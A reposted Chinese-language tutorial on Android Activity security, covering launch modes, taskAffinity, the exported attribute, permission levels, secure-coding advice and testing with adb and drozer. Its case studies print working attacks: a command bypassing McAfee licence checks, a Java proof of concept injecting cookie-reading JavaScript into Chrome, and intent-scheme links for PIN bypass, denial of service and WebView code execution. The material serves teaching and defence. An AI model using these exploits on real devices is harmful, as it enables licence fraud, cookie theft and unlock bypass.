Android Activtity Security(轉)

標籤：

Android四大組件之一--Activity安全詳解。

原帖地址：http://drops.wooyun.org/tips/3936 0x00 科普

Android每一個Application都是由Activity、Service、content Provider和Broadcast Receiver等Android的基本組件所組成，其中Activity是實現應用程式的主體，它承擔了大量的顯示和互動工作，甚至可以理解為一個"介面"就是一個Activity。

Activity是為使用者操作而展示的可視化使用者介面。比如說，一個activity可以展示一個功能表項目列表供使用者選擇，或者顯示一些包含說明的照片。一個短訊息應用程式可以包括一個用於顯示做為發送對象的連絡人的列表的activity，一個給選定的連絡人寫簡訊的activity以及翻閱以前的簡訊和改變設定的activity。儘管它們一起組成了一個內聚的使用者介面，但其中每個activity都與其它的保持獨立。每個都是以Activity類為基類的子類實現。

一個應用程式可以只有一個activity，或如剛才提到的簡訊應用程式那樣，包含很多個。每個activity的作用，以及其數目，自然取決於應用程式及其設計。一般情況下，總有一個應用程式被標記為使用者在應用程式啟動的時候第一個看到的。從一個activity轉向另一個的方式是靠當前的activity啟動下一個。

0x01 知識要點

參考：http://developer.android.com/guide/components/activities.html

生命週期

啟動方式

顯示啟動

設定檔中註冊組件

<activity android:name=".ExampleActivity" android:icon="@drawable/app_icon">     <intent-filter>         <action android:name="android.intent.action.MAIN" />         <category android:name="android.intent.category.LAUNCHER" />     </intent-filter></activity>

直接使用intent對象指定application以及activity啟動

Intent intent = new Intent(this, ExampleActivity.class);startActivity(intent);

未配置intent-filter的action屬性，activity只能使用顯示啟動。

私人Activity推薦使用顯示啟動。

隱式啟動

Intent intent = new Intent(Intent.ACTION_SEND);intent.putExtra(Intent.EXTRA_EMAIL, recipientArray);startActivity(intent);

載入模式launch mode

Activity有四種載入模式：

• standard：預設行為。每次啟動一個activity，系統都會在目標task建立一個執行個體。
• singleTop:如果目標activity的執行個體已經存在於目標task的棧頂，系統會直接使用該執行個體，並調用該activity的onNewIntent()（不會重新create）
• singleTask:在一個新任務的棧頂建立activity的執行個體。如果執行個體已經存在，系統會直接使用該執行個體，並調用該activity的onNewIntent()（不會重新create）
• singleInstance:和"singleTask"類似，但在目標activity的task中不會再運行其他的activity，在那個task中永遠只有一個activity。

設定的位置在AndroidManifest.xml檔案中activity元素的android:launchMode 屬性：

<activity android:name="ActB" android:launchMode="singleTask"></activity>

Activity launch mode 用於控制建立task和Activity執行個體。預設“standard“模式。Standard模式一次啟動即會產生一個新的Activity執行個體並且不會建立新的task，被啟動的Activity和啟動的Activity在同一個棧中。當建立新的task時，intent中的內容有可能被惡意應用讀取所以建議若無特別需求使用預設的standard模式即不配置launch mode屬性。launchMode能被Intent 的flag覆蓋。

taskAffinity

android系統中task管理Activity。Task的命名取決於root Activity的affinity。

預設情況下，app中的每個Activity都使用app的包名作為affinity。而Task的分配取決於app，故預設情況下一個app中所有的Activity屬於同一task。要改變task的分配，可以在AndroidManifest.xml檔案中設定affinity的值，但是這樣做會有不同task啟動Activity攜帶的intent中的資訊被其他應用讀取的風險。

FLAG_ACTIVITY_NEW_TASK

intent flag中一個重要的flag

啟動Activity時通過setFlags()或者addFlags()方法設定intent的flags屬效能夠改變launch mode，FLAG_ACTIVITY_NEW_TASK標記代表建立新的task（被啟動的Activity既不在前台也不在後台）。FLAG_ACTIVITY_MULTIPLE_TASK標記能和FLAG_ACTIVITY_NEW_TASK同時設定。這種情況下必會建立的task，所以intent中不應攜帶敏感性資料。

Task

stack:Activity承擔了大量的顯示和互動工作，從某種角度上將，我們看見的應用程式就是許多個Activity的組合。為了讓這許多 Activity協同工作而不至於產生混亂，Android平台設計了一種堆棧機制用於管理Activity，其遵循先進後出的原則，系統總是顯示位於棧頂的Activity，位於棧頂的Activity也就是最後開啟的Activity。

Task:是指將相關的Activity組合到一起，以Activity Stack的方式進行管理。從使用者體驗上講，一個“應用程式”就是一個Task，但是從根本上講，一個Task是可以有一個或多個Android Application組成的

如果使用者離開一個task很長時間，系統會清理棧頂以下的activity，這樣task被從新開啟時，棧頂activity就被還原了。

Intent Selector

多個Activity具有相同action時，當此調用此action時會彈出一個選取器供使用者選擇。

許可權

android:exported

一個Activity組件能否被外部應用啟動取決於此屬性，設定為true時Activity可以被外部應用啟動，設定為false則不能，此時Activity只能被自身app啟動。（同user id或者root也能啟動）

沒有配置intent-filter的action屬性exported預設為false（沒有filter只能通過明確的類名來啟動activity故相當於只有程式本身能啟動），配置了intent-filter的action屬性exported預設為true。

exported屬性只是用於限制Activity是否暴露給其他app，通過設定檔中的許可權申明也可以限制外部啟動activity。

android:protectionLevel

http://developer.android.com/intl/zh-cn/guide/topics/manifest/permission-element.html

normal:預設值。低風險許可權，只要申請了就可以使用，安裝時不需要使用者確認。

dangerous：像WRITE_SETTING和SEND_SMS等許可權是有風險的，因為這些許可權能夠用來重新設定裝置或者導致話費。使用此protectionLevel來標識使用者可能關注的一些許可權。Android將會在安裝程式時，警示使用者關於這些許可權的需求，具體的行為可能依據Android版本或者所安裝的行動裝置而有所變化。

signature：這些許可權僅授予那些和本程式應用了相同密鑰來簽名的程式。

signatureOrSystem:與signature類似，除了一點，系統中的程式也需要有資格來訪問。這樣允許定製Android系統應用也能獲得許可權，這種保護等級有助於整合系統編譯過程。

<!-- *** POINT 1 *** Define a permission with protectionLevel="signature" --><permissionandroid:name="org.jssec.android.permission.protectedapp.MY_PERMISSION"android:protectionLevel="signature" /><applicationandroid:icon="@drawable/ic_launcher"android:label="@string/app_name" ><!-- *** POINT 2 *** For a component, enforce the permission with its permission attribute --><activityandroid:name=".ProtectedActivity"android:exported="true"android:label="@string/app_name"android:permission="org.jssec.android.permission.protectedapp.MY_PERMISSION" ><!-- *** POINT 3 *** If the component is an activity, you must define no intent-filter --></activity>

關鍵方法

• onCreate(Bundle savedInstanceState)
• setResult(int resultCode, Intent data)
• startActivity(Intent intent)
• startActivityForResult(Intent intent, int requestCode)
• onActivityResult(int requestCode, int resultCode, Intent data)
• setResult (int resultCode, Intent data)
• getStringExtra (String name)
• addFlags(int flags)
• setFlags(int flags)
• setPackage(String packageName)
• getAction()
• setAction(String action)
• getData()
• setData(Uri data)
• getExtras()
• putExtra(String name, String value)

0x02 Activity分類

Activity類型和使用方式決定了其風險和防禦方式,故將Activity分類如下： Private、Public、Parter、In-house

private activity

私人Activity不應被其他應用啟動相對是安全的

建立activity時：

1、不指定taskAffinity //task管理activity。task的名字取決於根activity的affinity。預設設定中Activity使用包名做為affinity。task由app分配，所以一個應用的Activity在預設情況下屬於相同task。跨task啟動Activity的intent有可能被其他app讀取到。

2、不指定lunchMode //預設standard，建議使用預設。建立新task時有可能被其他應用讀取intent的內容。

3、設定exported屬性為false

4、謹慎處理從intent中接收的資料，不管是否內部發送的intent

5、敏感資訊只能在應用內部操作

使用activity時：

6、開啟activity時不設定FLAG_ACTIVITY_NEW_TASK標籤 //FLAG_ACTIVITY_NEW_TASK標籤用於建立新task（被啟動的Activity並未在棧中）。

7、開啟應用內部activity使用顯示啟動的方式

8、當putExtra()包含敏感資訊目的應是app內的activity

9、謹慎處理返回資料，即可資料來自相同應用

public activity

公開暴露的Activity組件，可以被任意應用啟動

建立activity：

1、設定exported屬性為true

2、謹慎處理接收的intent

3、有返回資料時不應包含敏感資訊

使用activity：

4、不應發送敏感資訊

5、當收到返回資料時謹慎處理

Parter、in-house部分參閱http://www.jssec.org/dl/android_securecoding_en.pdf

安全建議

• app內使用的私人Activity不應配置intent-filter，如果配置了intent-filter需設定exported屬性為false。
• 使用預設taskAffinity
• 使用預設launchMode
• 啟動Activity時不設定intent的FLAG_ACTIVITY_NEW_TASK標籤
• 謹慎處理接收的intent以及其攜帶的資訊
• 簽名驗證內部（in-house）app
• 當Activity返回資料時候需注意目標Activity是否有泄露資訊的風險
• 目的Activity十分明確時使用顯示啟動
• 謹慎處理Activity返回的資料，目的Activity返回的資料有可能是惡意應用偽造的
• 驗證目標Activity是否惡意app，以免受到intent欺騙，可用hash簽名驗證
• When Providing an Asset Secondhand, the Asset should be Protected with the Same Level of Protection
• 儘可能的不發送敏感資訊，應考慮到啟動public Activity中intent的資訊均有可能被惡意應用竊取的風險

0x04 測試方法

查看activity：

• 反編譯查看設定檔AndroidManifest.xml中activity組件（關注配置了intent-filter的及未設定export=“false”的）
• 直接用RE開啟安裝後的app查看設定檔
• Drozer掃描:run app.activity.info -a packagename
• 動態查看：logcat設定filter的tag為ActivityManager

啟動activity：

• adb shell：am start -a action -n package/componet
• drozer: run app.activity.start --action android.action.intent.VIEW ...
• 自己編寫app調用startActiviy()或startActivityForResult()
• 瀏覽器intent scheme遠程啟動:http://drops.wooyun.org/tips/2893

0x05 案例

案例1：繞過本地認證

WooYun: 華為網盤android用戶端本地密碼繞過（非root也可以）

繞過McAfee的key驗證，免費啟用。

$ am start -a android.intent.action.MAIN -n com.wsandroid.suite/com.mcafee.main.MfeMain

案例2：本地拒絕服務

WooYun: 快玩瀏覽器android用戶端本地拒絕服務

WooYun: 雪球android用戶端本地拒絕服務漏洞

WooYun: Tencent Messenger(QQ) Dos vulnerability(critical)

WooYun: Tencent WeiBo multiple Dos vulnerabilities(critical)

WooYun: Android原生的Settings應用存在必現崩潰問題（可造成拒絕服務的攻擊） (涉及fragment)

案例3：介面劫持

WooYun: android利用懸浮視窗實現介面劫持釣魚盜號

案例4：UXSS

漏洞存在於Chrome Android版本v18.0.1025123，class "com.google.android.apps.chrome.SimpleChromeActivity" 允許惡意應用注入js代碼到任意域. 部分 AndroidManifest.xml設定檔如下

<activity android:name="com.google.android.apps.chrome.SimpleChromeActivity" android:launchMode="singleTask" android:configChanges="keyboard|keyboardHidden|orientation|screenSize">         <intent-filter>             <action android:name="android.intent.action.VIEW" />             <category android:name="android.intent.category.DEFAULT" />         </intent-filter></activity>

Class "com.google.android.apps.chrome.SimpleChromeActivity" 配置 但是未設定 "android:exported" 為 "false". 惡意應用先調用該類並設定data為” http://google.com” 再次調用時設定data為惡意js例如‘javascript:alert(document.cookie)‘, 惡意代碼將在http://google.com域中執行. "com.google.android.apps.chrome.SimpleChromeActivity" class 可以通過Android api或者am（activityManager）開啟. POC如下

public class TestActivity extends Activity {     @Override     public void onCreate(Bundle savedInstanceState) {         super.onCreate(savedInstanceState);         Intent i = new Intent();                 ComponentName comp = new ComponentName(                                  "com.android.chrome",                                     "com.google.android.apps.chrome.SimpleChromeActivity");                 i.setComponent(comp);                 i.setAction("android.intent.action.VIEW");                 Uri data = Uri.parse("http://google.com");                 i.setData(data);                 startActivity(i);                     try {                         Thread.sleep(5000);                         }                           catch (Exception e) {}                 data = Uri.parse("javascript:alert(document.cookie)");                   i.setData(data);                 startActivity(i);     }}

案例5：隱式啟動intent包含敏感性資料

暫缺可公開案例,攻擊模型如。

案例6：Fragment注入(繞過PIN+拒絕服務)

Fragment這裡只提一下，以後可能另寫一篇。

<a href="intent:#Intent;S.:android:show_fragment=com.android.settings.ChooseLockPassword$ChooseLockPasswordFragment;B.confirm_credentials=false;launchFlags=0x00008000;SEL;action=android.settings.SETTINGS;end">16、bypass Pin android 3.0-4.3 （selector）</a><br>

<a href="intent:#Intent;S.:android:show_fragment=XXXX;launchFlags=0x00008000;SEL;component=com.android.settings/com.android.settings.Settings;end">17、fragment dos android 4.4 (selector)</a><br>

案例7:webview RCE

<a href="intent:#Intent;component=com.gift.android/.activity.WebViewIndexActivity;S.url=http://drops.wooyun.org/webview.html;S.title=WebView;end">15、驢媽媽代碼執行（fixed）</a><br>

0x06 參考

http://www.jssec.org/dl/android_securecoding_en.pdf

Android Activtity Security(轉)